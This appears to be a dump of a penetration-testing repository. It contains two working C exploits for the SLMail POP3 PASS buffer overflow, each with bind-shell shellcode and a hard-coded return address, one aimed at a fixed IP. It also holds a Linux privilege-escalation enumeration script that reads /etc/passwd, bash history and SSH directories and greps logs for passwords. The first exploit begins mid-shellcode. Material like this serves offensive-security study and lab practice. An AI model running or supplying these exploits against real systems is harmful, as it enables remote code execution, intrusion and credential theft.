"\x8d\x25\x1e\x5b\xc4\xa9\x41\x7b\xe7\x63\xf4\xbc\x70\x4c" 33 | "\xaf\x5c\x16\x24\xb2\x60\x3e\x21\x3b\x86\x54\x59\x6a\x11" 34 | "\xc1\xc0\x37\xe9\x70\x0c\xe2\x79\x10\x9f\x69\x79\x5f\xbc" 35 | "\x25\x2e\x08\x72\x3c\xba\xa4\x2d\x96\xd8\x34\xab\xd1\x58" 36 | "\xe3\x08\xdf\x61\x66\x34\xfb\x71\xbe\xb5\x47\x25\x6e\xe0" 37 | "\x11\x93\xc8\x5a\xd0\x4d\x83\x31\xba\x19\x52\x7a\x7d\x5f" 38 | "\x5b\x57\x0b\xbf\xea\x0e\x4a\xc0\xc3\xc6\x5a\xb9\x39\x77" 39 | "\xa4\x10\xfa\x97\x47\xb0\xf7\x3f\xde\x51\xba\x5d\xe1\x8c" 40 | "\xf9\x5b\x62\x24\x82\x9f\x7a\x4d\x87\xe4\x3c\xbe\xf5\x75" 41 | "\xa9\xc0\xaa\x76\xf8"; 42 | 43 | struct sockaddr_in plm,lar,target; 44 | 45 | int conn(char *ip) 46 | { 47 | int sockfd; 48 | plm.sin_family = AF_INET; 49 | plm.sin_port = htons(PORT); 50 | plm.sin_addr.s_addr = inet_addr(ip); 51 | bzero(&(plm.sin_zero),8); 52 | sockfd = socket(AF_INET,SOCK_STREAM,0); 53 | if((connect(sockfd,(struct sockaddr *)&plm,sizeof(struct sockaddr))) < 0) 54 | { 55 | perror("[-] connect 
error!"); 56 | exit(0); 57 | } 58 | printf("[*] Connected to: %s.\n",ip); 59 | return sockfd; 60 | } 61 | 62 | int main(int argc, char *argv[]) 63 | { 64 | int xs; 65 | char out[1024]; 66 | char *off = malloc(2606); 67 | memset(off, 0x41, 2606); 68 | char *nop = malloc(8); 69 | memset(nop, 0x90, 8); 70 | strcat(off, RETADD); 71 | strcat(off, nop); 72 | strcat(off, shellcode); 73 | 74 | printf("[+] SLMAIL Remote buffer overflow exploit in POP3 PASS by Haroon Rashid Astwat.\n"); 75 | xs = conn("192.168.31.154"); 76 | read(xs, out, 1024); 77 | printf("[*] %s", out); 78 | write(xs,"USER username\r\n", 15); 79 | read(xs, out, 1024); 80 | printf("[*] %s", out); 81 | write(xs,"PASS ",5); 82 | write(xs,off,strlen(off)); 83 | printf("Shellcode len: %d bytes\n",strlen(shellcode)); 84 | printf("Buffer len: %d bytes\n",strlen(off)); 85 | write(xs,"\r\n",4); 86 | close(xs); 87 | } 88 | -------------------------------------------------------------------------------- /Seba/646_modified.c: -------------------------------------------------------------------------------- 1 | /* 2 | SLMAIL REMOTE PASSWD BOF - Ivan Ivanovic Ivanov ????-????? 3 | ???????????????? 
31337 Team 4 | */ 5 | 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | // [*] bind 4444 12 | unsigned char shellcode[] = 13 | "\xb8\xe6\x01\x8e\xd3\xda\xce\xd9\x74\x24\xf4\x5a\x29\xc9" 14 | "\xb1\x4f\x31\x42\x14\x03\x42\x14\x83\xc2\x04\x04\xf4\x72" 15 | "\x3b\x41\xf7\x8a\xbc\x31\x71\x6f\x8d\x63\xe5\xfb\xbc\xb3" 16 | "\x6d\xa9\x4c\x38\x23\x5a\xc6\x4c\xec\x6d\x6f\xfa\xca\x40" 17 | "\x70\xcb\xd2\x0f\xb2\x4a\xaf\x4d\xe7\xac\x8e\x9d\xfa\xad" 18 | "\xd7\xc0\xf5\xff\x80\x8f\xa4\xef\xa5\xd2\x74\x0e\x6a\x59" 19 | "\xc4\x68\x0f\x9e\xb1\xc2\x0e\xcf\x6a\x59\x58\xf7\x01\x05" 20 | "\x79\x06\xc5\x56\x45\x41\x62\xac\x3d\x50\xa2\xfd\xbe\x62" 21 | "\x8a\x51\x81\x4a\x07\xa8\xc5\x6d\xf8\xdf\x3d\x8e\x85\xe7" 22 | "\x85\xec\x51\x62\x18\x56\x11\xd4\xf8\x66\xf6\x82\x8b\x65" 23 | "\xb3\xc1\xd4\x69\x42\x06\x6f\x95\xcf\xa9\xa0\x1f\x8b\x8d" 24 | "\x64\x7b\x4f\xac\x3d\x21\x3e\xd1\x5e\x8d\x9f\x77\x14\x3c" 25 | "\xcb\x01\x77\x29\x38\x3f\x88\xa9\x56\x48\xfb\x9b\xf9\xe2" 26 | "\x93\x97\x72\x2c\x63\xd7\xa8\x88\xfb\x26\x53\xe8\xd2\xec" 27 | "\x07\xb8\x4c\xc4\x27\x53\x8d\xe9\xfd\xf3\xdd\x45\xae\xb3" 28 | "\x8d\x25\x1e\x5b\xc4\xa9\x41\x7b\xe7\x63\xf4\xbc\x70\x4c" 29 | "\xaf\x5c\x16\x24\xb2\x60\x3e\x21\x3b\x86\x54\x59\x6a\x11" 30 | "\xc1\xc0\x37\xe9\x70\x0c\xe2\x79\x10\x9f\x69\x79\x5f\xbc" 31 | "\x25\x2e\x08\x72\x3c\xba\xa4\x2d\x96\xd8\x34\xab\xd1\x58" 32 | "\xe3\x08\xdf\x61\x66\x34\xfb\x71\xbe\xb5\x47\x25\x6e\xe0" 33 | "\x11\x93\xc8\x5a\xd0\x4d\x83\x31\xba\x19\x52\x7a\x7d\x5f" 34 | "\x5b\x57\x0b\xbf\xea\x0e\x4a\xc0\xc3\xc6\x5a\xb9\x39\x77" 35 | "\xa4\x10\xfa\x97\x47\xb0\xf7\x3f\xde\x51\xba\x5d\xe1\x8c" 36 | "\xf9\x5b\x62\x24\x82\x9f\x7a\x4d\x87\xe4\x3c\xbe\xf5\x75" 37 | "\xa9\xc0\xaa\x76\xf8"; 38 | 39 | void exploit(int sock) { 40 | FILE *test; 41 | int *ptr; 42 | char userbuf[] = "USER madivan\r\n"; 43 | char evil[2959]; 44 | char buf[2959]; 45 | char receive[1024]; 46 | char nopsled[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"; 47 | memset(buf, 0x00, 2959); 48 | memset(evil, 
0x41, 2959); 49 | ptr = &evil; 50 | // 652*4 = 2608 51 | ptr = ptr + 652; // 2608 52 | memcpy(ptr, &nopsled, 12); 53 | ptr = ptr + 3; 54 | memcpy(ptr, &shellcode, 317); 55 | // assign the return address 56 | *(long*)&evil[2606] = 0x5F4A358F; 57 | 58 | // banner 59 | recv(sock, receive, 200, 0); 60 | printf("[+] %s", receive); 61 | // user 62 | printf("[+] Sending Username...\n"); 63 | send(sock, userbuf, strlen(userbuf), 0); 64 | recv(sock, receive, 200, 0); 65 | printf("[+] %s", receive); 66 | // passwd 67 | printf("[+] Sending Evil buffer...\n"); 68 | sprintf(buf, "PASS %s\r\n", evil); 69 | //test = fopen("test.txt", "w"); 70 | //fprintf(test, "%s", buf); 71 | //fclose(test); 72 | send(sock, buf, strlen(buf), 0); 73 | printf("[*] Done! Connect to the host on port 9876...\n\n"); 74 | } 75 | 76 | int connect_target(char *host, u_short port) 77 | { 78 | int sock = 0; 79 | struct hostent *hp; 80 | WSADATA wsa; 81 | struct sockaddr_in sa; 82 | 83 | WSAStartup(MAKEWORD(2,0), &wsa); 84 | memset(&sa, 0, sizeof(sa)); 85 | 86 | hp = gethostbyname(host); 87 | if (hp == NULL) { 88 | printf("gethostbyname() error!\n"); exit(0); 89 | } 90 | printf("[+] Connecting to %s\n", host); 91 | sa.sin_family = AF_INET; 92 | sa.sin_port = htons(port); 93 | sa.sin_addr = **((struct in_addr **) hp->h_addr_list); 94 | 95 | sock = socket(AF_INET, SOCK_STREAM, 0); 96 | if (sock < 0) { 97 | printf("[-] socket blah?\n"); 98 | exit(0); 99 | } 100 | if (connect(sock, (struct sockaddr *) &sa, sizeof(sa)) < 0) 101 | {printf("[-] connect() blah!\n"); 102 | exit(0); 103 | } 104 | printf("[+] Connected to %s\n", host); 105 | return sock; 106 | } 107 | 108 | 109 | int main(int argc, char **argv) 110 | { 111 | int sock = 0; 112 | int data, port; 113 | printf("\n[$] SLMail Server POP3 PASSWD Buffer Overflow exploit\n"); 114 | printf("[$] by Mad Ivan [ void31337 team ] - http://exploit.void31337.ru\n\n"); 115 | if ( argc < 2 ) { printf("usage: slmail-ex.exe \n\n"); exit(0); } 116 | port = 110; 117 | sock 
= connect_target(argv[1], port); 118 | exploit(sock); 119 | closesocket(sock); 120 | return 0; 121 | } 122 | -------------------------------------------------------------------------------- /Seba/linux_priv_esc_enum.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #tool that runs the usual local enumeration checks used when assessing privilege escalation paths on Linux; every check is a read-only command listed in the arrays below 4 | 5 | #OS info enumeration 6 | 7 | #function that prints the coloured title banner of a section 8 | # 9 | #$1 = title of the section (e.g. System Info) 10 | echo_title(){ 11 | echo -e "\e[00;33m### $1 ##############################################\e[00m" 12 | echo -e "\n" 13 | } 14 | 15 | 16 | #function that prints a description, then runs the given command and prints its output 17 | # 18 | #$1 = short description of the command 19 | #$2 = the command itself, run through eval: it must only ever come from the hard-coded arrays in this file, never from user input; the caller passes $1 unquoted, so keys must contain no whitespace 20 | echo_command(){ 21 | echo -e "\e[1;33m$1: \n\e[\033[1;0m" 22 | eval $2 23 | echo -e "\n" 24 | } 25 | 26 | #function that loops over every entry of the given array and runs each command via echo_command 27 | # 28 | #$1 = output of 'declare -p ARRAY' for an associative array of title => command 29 | run_section_commands(){ 30 | #rebuild the associative array locally from the declare -p text (everything after the first '=') 31 | eval "declare -A arg_array="${1#*=} 32 | #run each command, keyed by its title 33 | for key in "${!arg_array[@]}"; do 34 | echo_command $key "${arg_array[$key]}" 35 | done 36 | } 37 | 38 | #enumerate system info 39 | declare -A SYSTEM_INFO=( 40 | ["ALL"]="uname -a" 41 | ["KERNEL_RELEASE"]="uname -r" 42 | ["HOSTNAME"]="hostname" 43 | ["ARCH"]="uname -m" 44 | ["KERNEL_INFO"]="cat /proc/version" 45 | ["DISTRO_INFO"]="cat /etc/issue" 46 | ) 47 | 48 | #enumerate users and groups on the system (NOTE(review): SUDOERS actually lists the UID/GID-0 entries of /etc/passwd, not sudoers; its inner double quotes around :0: end the string early and only work because :0: has no shell-special characters, so quote the pattern with single quotes) 49 | declare -A USER_GROUP=( 50 | ["ALL_USERS"]="cat /etc/passwd" 51 | ["ALL_GROUPS"]="cat /etc/group" 52 | ["SUDOERS"]="grep -E ":0:" /etc/passwd" 53 | ["USER_CURRENT_LOGGED"]="w" 54 | ) 55 | 56 | #enumerate the current user's identity 57 | declare -A CURRENT_USER=( 58 | ["WHOAMI"]="whoami" 59 | ["ID"]="id" 60 | ) 61 | 62 | #enumerate environment info (NOTE(review): the history builtin usually prints nothing from a non-interactive script; the BASH_HISTORY entry further down reads the file directly) 63 | declare -A ENV_INFO=( 64 
| ["VARIABLES"]="env" 65 | ["HISTORY"]="history" 66 | ) 67 | 68 | #enumerate interesting files on the system (NOTE(review): WORLD_WRITABLE_FILES has unescaped inner double quotes around */proc/*, so the string ends early and the pattern is subject to pathname expansion when the array is assigned - harmless only because nothing matches; quote it as '*/proc/*'. The two world-writable finds also lack the 2>/dev/null that SUID_FILES has, so permission-denied noise will fill the output) 69 | declare -A INTERESTING_FILES_DISCOVER=( 70 | ["SUID_FILES"]="find / -perm -4000 -type f 2>/dev/null" 71 | ["WORLD_WRITABLE_FILES"]="find / ! -path "*/proc/*" -perm -2 -type f" 72 | ["WORLD_WRITABLE_DIR"]="find / -perm -2 -type d" 73 | ["ROOT_DIR_ACCESS"]="ls -ahlR /root/" 74 | ["BASH_HISTORY"]="cat ~/.bash_history" 75 | ["SSH_FILES"]="ls -la ~/.ssh/" 76 | ["LOG_FILE_WITH_PASS"]="grep -l -i pass /var/log/*.log 2>/dev/null" 77 | ["LIST_OPEN_FILES"]="lsof -i -n" 78 | ) 79 | 80 | #enumerate processes running as root and the (x)inetd service configs 81 | declare -A SERVICE_INFO=( 82 | ["ROOT_PROCESS"]="ps -aux | grep root" 83 | ["IINETD_PROCESS"]="cat /etc/inetd.conf" 84 | ["XINETD_PROCESS"]="cat /etc/xinetd.conf" 85 | ) 86 | 87 | #enumerate cron jobs (NOTE(review): CRON_WRITABLE's inner double quotes end the string at grep -E, so the pattern reaches grep as w. without its trailing space and also matches owner-writable entries, and the stray " " after it becomes a key-less second element that bash is expected to reject in an associative array; quote the pattern as 'w. ' or use find /etc/cron* -perm -o+w instead of parsing ls output) 88 | declare -A JOBS_INFO=( 89 | ["CRON"]="ls -la /etc/cron*" 90 | ["CRON_WRITABLE"]=" ls -aRl /etc/cron* | grep -E "w. " " 91 | ) 92 | 93 | #enumerate network info (ifconfig, route and netstat come from the legacy net-tools package and are absent on many current distributions; ip addr, ip route and ss -tan / ss -uan are the maintained equivalents) 94 | declare -A NETWORK_INFO=( 95 | ["INTERFACES"]="/sbin/ifconfig -a" 96 | ["ROUTES"]="route" 97 | ["DNS"]="cat /etc/resolv.conf" 98 | ["TCP_CONNECTION"]="netstat -ant" 99 | ["UDP_CONNECTION"]="netstat -anu" 100 | ["USED_PORT"]="cat /etc/services" 101 | ) 102 | 103 | 104 | #enumerate installed programs, the sudo version and available compilers 105 | declare -A PROGRAMS_INFO=( 106 | ["SUDO_VERSION"]="sudo -V | head -1" 107 | ["PROGRAMS_DEBIAN"]="dpkg -l" 108 | ["PROGRAMS_REDHAT"]="rpm -qa" 109 | ["COMPILERS_DECOMPILERS"]="dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null" 110 | ) 111 | 112 | echo -e "\n\e[00;31m#########################################################\e[00m" 113 | echo -e "\e[00;31m#\e[00m" "\e[00;33m Privilege Escalation Script \e[00m" "\e[00;31m#\e[00m" 114 | echo -e "\e[00;31m#########################################################\e[00m" 115 | 116 | echo -e "\n" 117 | 118 | #enumerate the OS kernel version, the distro, etc. 
119 | #each section prints its banner, then hands the array to run_section_commands serialised with declare -p (presumably because the array cannot be passed directly as an argument) 120 | echo_title "SYSTEM INFO" 121 | 122 | run_section_commands "$(declare -p SYSTEM_INFO)" 123 | 124 | #enumerate the users and groups on the system and what they are doing 125 | 126 | echo_title "USERS AND GROUPS INFO" 127 | 128 | run_section_commands "$(declare -p USER_GROUP)" 129 | 130 | #enumerate the current user info 131 | 132 | echo_title "CURRENT USER INFO" 133 | 134 | run_section_commands "$(declare -p CURRENT_USER)" 135 | 136 | #enumerate the environment info 137 | 138 | echo_title "ENV INFO" 139 | 140 | run_section_commands "$(declare -p ENV_INFO)" 141 | 142 | #enumerate the interesting files on the system 143 | 144 | echo_title "INTERESTING FILES" 145 | 146 | run_section_commands "$(declare -p INTERESTING_FILES_DISCOVER)" 147 | 148 | #enumerate the processes 149 | 150 | echo_title "SERVICE INFO" 151 | 152 | run_section_commands "$(declare -p SERVICE_INFO)" 153 | 154 | #enumerate cron jobs 155 | 156 | echo_title "CRON INFO" 157 | 158 | run_section_commands "$(declare -p JOBS_INFO)" 159 | 160 | #enumerate network info 161 | 162 | echo_title "NETWORK INFO" 163 | 164 | run_section_commands "$(declare -p NETWORK_INFO)" 165 | 166 | #enumerate installed programs 167 | 168 | echo_title "PROGRAMS INFO" 169 | 170 | run_section_commands "$(declare -p PROGRAMS_INFO)" 171 | 172 | 173 | -------------------------------------------------------------------------------- /Seba/ms12-037-2.html: -------------------------------------------------------------------------------- 1 | 22 | 23 | 24 | 25 |